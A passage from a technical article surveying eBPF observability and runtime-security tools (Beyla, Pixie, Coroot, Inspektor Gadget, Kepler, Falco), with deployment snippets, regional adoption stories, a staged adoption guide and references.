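    return TraceContext(version, trace_id, parent_id, bool(int(flags, 16) & 0x01))


ctx = parse_traceparent("00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01")
print(ctx)
```

An agent that can read this header from captured request bytes can stitch its spans into traces started by SDK-instrumented services, which is what makes eBPF capture and code-level instrumentation composable.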

Plain run (pick the process to follow via BEYLA_EXECUTABLE_NAME; `sudo -E` keeps the environment variables, which plain `sudo` would normally drop)

BEYLA_EXECUTABLE_NAME=myapp \
BEYLA_PROMETHEUS_PORT=9090 \
BEYLA_OPEN_PORT=8080 \
sudo -E beyla

DaemonSet in k8s

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: beyla
spec:
  selector:
    matchLabels:
      app: beyla
  template:
    metadata:
      labels:
        app: beyla
    spec:
      hostPID: true # to see processes outside this container
      containers:
        - name: beyla
          image: grafana/beyla:latest
          securityContext:
            privileged: true # simplification; a narrower capability set is possible, see the Beyla docs
          env:
            - name: BEYLA_OPEN_PORT
              value: '80,443,8000-8999' # instrument anything listening on these ports (adjust to your services)
            - name: OTEL_EXPORTER_OTLP_ENDPOINT
              value: 'http://otel-collector:4318'

Beyla vs Pixie

| Aspect | Beyla | Pixie |
|--------|-------|-------|
| Backed by | Grafana Labs | New Relic |
| License | Apache 2.0 | Apache 2.0 |
| Data model | OTLP (standard) | PxL queries (custom) |
| Backend | Tempo, Jaeger, any OTLP backend | Pixie Vizier + export |
| Strength | OTel-ecosystem integration | In-memory queries, rich UI |

The 2026 direction is clear. **Auto-instrumentation is, in practice, all converging on OpenTelemetry**, and Beyla / Pixie / Coroot are paving that road.

10. Coroot — Auto-Inferred Observability

Coroot is a relatively new project that surfaced in 2023, but its "auto-inferred" observability approach has rapidly caught on. Open source (Apache 2.0).

What "auto-inferred" means

Traditional observability forces a human to define:

- Which metrics constitute an SLO

- Which services depend on which other services

- What the alerting thresholds are

- Which log patterns are errors

Coroot's promise: **"observe all of that with eBPF and infer the rest automatically."**

What Coroot infers automatically:

1. Service-dependency graph (from network flows)

2. SLO candidates (from HTTP/gRPC traffic analysis)

3. Database query grouping (auto-normalized, auto-classified)

4. Alert candidates (based on anomaly detection)

5. Cost / resource-efficiency analysis

Architecture

Coroot also runs per-node agents (coroot-node-agent). Those agents capture via eBPF:

- TCP connections, RTT, retransmits

- HTTP/HTTPS (TLS captured with uprobes)

- DB protocols (PostgreSQL, MySQL, Redis, MongoDB)

- File I/O, CPU use

The collected data is stored by Coroot Server (Go) on Prometheus and ClickHouse backends.

What you see

Open Coroot's UI and you immediately see things like:

- A "frontend -> api -> postgres -> s3" dependency graph

- Per-edge RPS, p99 latency, error rate

- "Among queries hitting postgres, SELECT * FROM users WHERE ... is the slowest at p99 200 ms"

- "Frontend node ip-10-0-1-23 is 30% higher CPU than baseline"

All automatic. Nobody built those dashboards. Especially useful for small teams.

Limits

Coroot trades "standard" for "convenience." Its backend is Prometheus + ClickHouse, which is good for data portability, but its data model is custom — so organizations already invested in Datadog or Honeycomb face additional learning.

11. Inspektor Gadget / Kepler / Falco — A Small but Important Trio

Inspektor Gadget (Microsoft, CNCF Sandbox)

Inspektor Gadget is a "collection of eBPF-built k8s debugging tools" sponsored by Microsoft. It runs as a kubectl plugin.

kubectl gadget trace exec # track new processes across the whole cluster

kubectl gadget trace open # which files are being opened

kubectl gadget trace dns # DNS query flows

kubectl gadget snapshot socket # snapshot open sockets on every node

kubectl gadget top file # top file-I/O users

Internally it began as a wrapper around BCC tools and has evolved into its own IG (Inspektor Gadget) framework, CO-RE based.

Kepler (Sustainable Computing)

Kepler (Kubernetes Efficient Power Level Exporter) started in CNCF Sandbox and was promoted to Incubating in 2025. It measures per-container power usage.

The method is clever. It combines hardware energy counters (RAPL: Running Average Power Limit) with per-container resource usage (CPU, disk I/O, network I/O) attributed via eBPF, and a machine-learning model estimates power where direct readings are unavailable.

Exposed as Prometheus metrics

kepler_container_joules_total{container_name="myapp"} 12345.6

kepler_container_other_joules_total{...}

These metrics feed Cloud Carbon Footprint calculators that translate to "how many kg of CO2 did this service produce this month." Directly tied to ESG reporting and FinOps.
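The attribution and conversion steps can be sketched in Python. This is a simplified model, not Kepler's algorithm: it splits a node-level energy reading purely by CPU-time share, and the grid carbon intensity passed to `joules_to_kg_co2` is an input you would have to supply from your own region's data. Function names are chosen for this example.

```python
from typing import Dict


def attribute_energy(node_joules: float,
                     cpu_seconds: Dict[str, float]) -> Dict[str, float]:
    """Split a node-level energy reading across containers by CPU-time share."""
    total = sum(cpu_seconds.values())
    if total <= 0:
        return {name: 0.0 for name in cpu_seconds}
    return {name: node_joules * secs / total for name, secs in cpu_seconds.items()}


def joules_to_kg_co2(joules: float, grid_kg_per_kwh: float) -> float:
    """Convert energy to emissions; 1 kWh = 3.6e6 J."""
    return joules / 3.6e6 * grid_kg_per_kwh


# Synthetic interval: the node used 1000 J while two containers ran.
shares = attribute_energy(1000.0, {"api": 30.0, "db": 10.0})
print(shares)
# Hypothetical grid intensity of 0.5 kg CO2 per kWh.
print(joules_to_kg_co2(3.6e6, 0.5))
```

A proportional split like this is the simplest defensible baseline; it ignores idle power and non-CPU components, which is part of what a trained model is meant to improve on.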

Falco (CNCF Graduated)

Falco became CNCF Graduated in 2024. The essence is "a runtime-security engine that hooks system calls and evaluates rules."

Excerpt of falco_rules.yaml

- rule: Write below etc
  desc: an attempt to write to any file below /etc
  condition: write_etc_common
  output: 'File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name parent=%proc.pname)'
  priority: ERROR
  tags: [filesystem, mitre_persistence]

Falco's default driver is now the modern eBPF probe (libbpf-based, CO-RE); the kernel-module driver remains available, and the older non-CO-RE eBPF probe is the legacy path. The "Falco Rules" official repository ships 600+ rules covering most MITRE ATT&CK categories.

Tetragon and Falco are competitors but are often deployed together. Falco has the rich rule library, Tetragon has the strong real-time enforcement.

12. eBPF for Windows / macOS — Beyond Linux

eBPF is no longer a Linux-only technology.

eBPF for Windows (Microsoft)

Microsoft kicked off the eBPF-for-Windows project in 2021. As of 2026, a stable version ships in Windows Server 2025 and Azure has started production use.

Linux-compatible:

- libbpf-compatible API

- The same .o file (mostly) loads on both

- Core types: BPF_PROG_TYPE_XDP, BPF_PROG_TYPE_BIND, BPF_PROG_TYPE_CGROUP_SOCK, ...

Differences:

- Verifier is PREVAIL (an independent verifier that grew out of academic research, separate from the Linux kernel's verifier)

- JIT is based on uBPF (a user-space eBPF runtime from the iovisor project)

- Hook points center on NDIS (the network driver stack)

Azure's security team runs Tetragon-style hooks on Windows VMs, and Cilium's Windows-node support is in progress. Not yet a game-changer, but the perception of "eBPF is Linux-only" is fading fast.

macOS and Apple Silicon

Apple does not officially support eBPF. macOS has kqueue, DTrace, and the Endpoint Security API filling similar roles. That said, since 2025 it has become commonplace to run eBPF tools inside Linux VMs on Apple Silicon (Lima, Tart, OrbStack), and Asahi Linux has solid ARM eBPF support.

There are experimental unofficial ports (mac-bpf, ebpf-darwin), but no production use to speak of. On macOS, the right answer is running eBPF inside a Linux VM.

13. Korean / Japanese Adoption — Toss, Kakao, LINE, Mercari

Toss — Cilium + Hubble + Tetragon as a Company Standard

Toss announced at SLASH 2024 (their developer conference) that their infrastructure is EKS + Cilium based. The main driver was iptables-rule explosion in kube-proxy. After adopting Cilium:

- iptables rules per node dropped from 10,000+ to nearly zero

- Service-discovery latency p99 dropped meaningfully

- Hubble visualized microservice dependencies

- Tetragon does runtime blocking in some security-sensitive domains

The SLASH 2024 talk is publicly available on YouTube.

Kakao — eBPF-Based In-House Tracing

Kakao presented an in-house eBPF-based tracing system at ifkakao 2024. The core is BCC plus a custom collector that auto-captures RPC calls and database queries. They evaluated Pixie but chose to build it in-house.

LINE / LY Corporation

LINE has shared eBPF use cases multiple times on the LINE Engineering blog. They lean on bpftrace heavily for analyzing TCP retransmits in messenger traffic and network-debugging Kafka clusters.

Mercari — Continuous Profiling

Mercari shared on the Mercari Engineering blog in 2024 how they put Grafana Pyroscope (Parca-compatible) into production. They found CPU hotspots across 100+ Go microservices and cut EC2 costs as a result.

Yahoo Japan / LY Corporation

Yahoo! JAPAN has been operating eBPF-based network observability since 2023. A custom collector captures every TCP flow on every node and stores it in ClickHouse.

14. An Adoption Decision Guide — What to Use When

Finally, the practical decision guide. Do not "adopt everything at once" — go stage by stage.

Stage 1 — Do you need network visibility?

Start with **Cilium + Hubble**. Swapping the CNI is the biggest short-term change, but the biggest long-term payoff. If this is a new cluster, just go Cilium.

Stage 2 — You have no APM, or it is too expensive

Install **Beyla** (OTel-friendly) or **Pixie** (in-memory queries) on one cluster. Within a month you will see "which services are slow."

Stage 3 — You need profiling data

Install **Parca** or **Grafana Pyroscope**. For Go / Rust / Java workloads, CPU hotspots become instantly visible. Especially effective on AI infrastructure where CPU and memory are expensive.

Stage 4 — You need runtime security

Start with **Falco** — rich ruleset, easy install. If you genuinely need real-time blocking, add **Tetragon**.

Stage 5 — You debug k8s often

Install **Inspektor Gadget** as a kubectl plugin. `kubectl gadget trace exec` and friends become daily workflow.

Stage 6 — You need resource / power monitoring

**Kepler** for power. **Coroot** for an auto-inferred dashboard.

Stage 7 — Troubleshooting tools

**BCC + bpftrace** should always be installed for on-the-spot debugging over SSH.

Anti-patterns

- **Install every tool** — Resource overhead stacks up; ops burden grows. Budget roughly 100–500 MB of memory per node for each tool

- **Old kernels without CO-RE** — Linux below 5.4 means upgrading is priority #1

- **Kernels without BTF** — If `/sys/kernel/btf/vmlinux` is missing, you depend on BTFHub

- **Reckless privileged DaemonSets** — Grant CAP_BPF, CAP_PERFMON, CAP_NET_ADMIN explicitly, avoid root

- **Turning on auto-blocking too quickly** — A misconfigured Tetragon Sigkill action will kill perfectly healthy processes. Run in alert mode first, validate patterns, then switch to block mode

Closing — Why eBPF Became the Default Infrastructure Tool

eBPF's explosive growth has clear reasons:

1. **CO-RE made ops easy** — No kernel headers, no compilers required

2. **Safety** — The isolation the verifier guarantees is something kernel modules never could

3. **Performance** — Hook cost is typically under 100 ns, so you can leave it on in production

4. **Standardization** — OpenTelemetry converged the data model, CNCF validates the tools

5. **Polyglot** — A single agent observes Go, Rust, C++, Python, and Java

An infrastructure engineer in 2026 not knowing eBPF is like an infrastructure engineer in 2016 not knowing Docker. Start by reading one book (Liz Rice's "Learning eBPF" or Brendan Gregg's "BPF Performance Tools"), then drop Cilium + Hubble + Beyla onto one cluster.

> "We instrumented production with eBPF and discovered three latency issues that had been there for two years. We never had to add a single log line." — Lyft Engineering, 2024

References

- [eBPF official site](https://ebpf.io/)

- [eBPF Foundation](https://ebpf.foundation/)

- [Linux Kernel BPF docs](https://docs.kernel.org/bpf/)

- [libbpf on GitHub](https://github.com/libbpf/libbpf)

- [bpftool on GitHub](https://github.com/libbpf/bpftool)

- [CO-RE guide — Andrii Nakryiko's blog](https://nakryiko.com/posts/bpf-portability-and-co-re/)

- [Liz Rice — Learning eBPF (O'Reilly, 2023)](https://www.oreilly.com/library/view/learning-ebpf/9781098135119/)

- [Brendan Gregg — BPF Performance Tools (Addison-Wesley, 2019)](https://www.brendangregg.com/bpf-performance-tools-book.html)

- [Brendan Gregg — Systems Performance, 2nd ed.](https://www.brendangregg.com/systems-performance-2nd-edition-book.html)

- [Pixie](https://px.dev/)

- [Pixie on GitHub](https://github.com/pixie-io/pixie)

- [Parca](https://www.parca.dev/)

- [Polar Signals blog](https://www.polarsignals.com/blog)

- [Cilium](https://cilium.io/)

- [Hubble on GitHub](https://github.com/cilium/hubble)

- [Tetragon](https://tetragon.io/)

- [Tetragon on GitHub](https://github.com/cilium/tetragon)

- [BCC on GitHub](https://github.com/iovisor/bcc)

- [bpftrace on GitHub](https://github.com/bpftrace/bpftrace)

- [OpenTelemetry eBPF on GitHub](https://github.com/open-telemetry/opentelemetry-ebpf)

- [Grafana Beyla](https://grafana.com/oss/beyla-ebpf/)

- [Grafana Beyla on GitHub](https://github.com/grafana/beyla)

- [Grafana Pyroscope](https://grafana.com/oss/pyroscope/)

- [Coroot](https://coroot.com/)

- [Coroot on GitHub](https://github.com/coroot/coroot)

- [Inspektor Gadget](https://www.inspektor-gadget.io/)

- [Kepler](https://sustainable-computing.io/)

- [Kepler on GitHub](https://github.com/sustainable-computing-io/kepler)

- [Falco](https://falco.org/)

- [Falco on GitHub](https://github.com/falcosecurity/falco)

- [eBPF for Windows on GitHub](https://github.com/microsoft/ebpf-for-windows)

- [Asahi Linux](https://asahilinux.org/)

- [sched_ext](https://sched-ext.com/)

- [BTFHub — BTF for old kernels](https://github.com/aquasecurity/btfhub)

- [Toss SLASH 24 — Cilium adoption talk](https://toss.tech/slash-24)

- [LINE Engineering blog](https://engineering.linecorp.com/en)

- [Mercari Engineering blog](https://engineering.mercari.com/en/)

- [eBPF Summit](https://ebpf.io/summit-2024/)

- [CNCF Landscape — Observability and Analysis](https://landscape.cncf.io/)

- [Isovalent (Cisco) blog](https://isovalent.com/blog/)
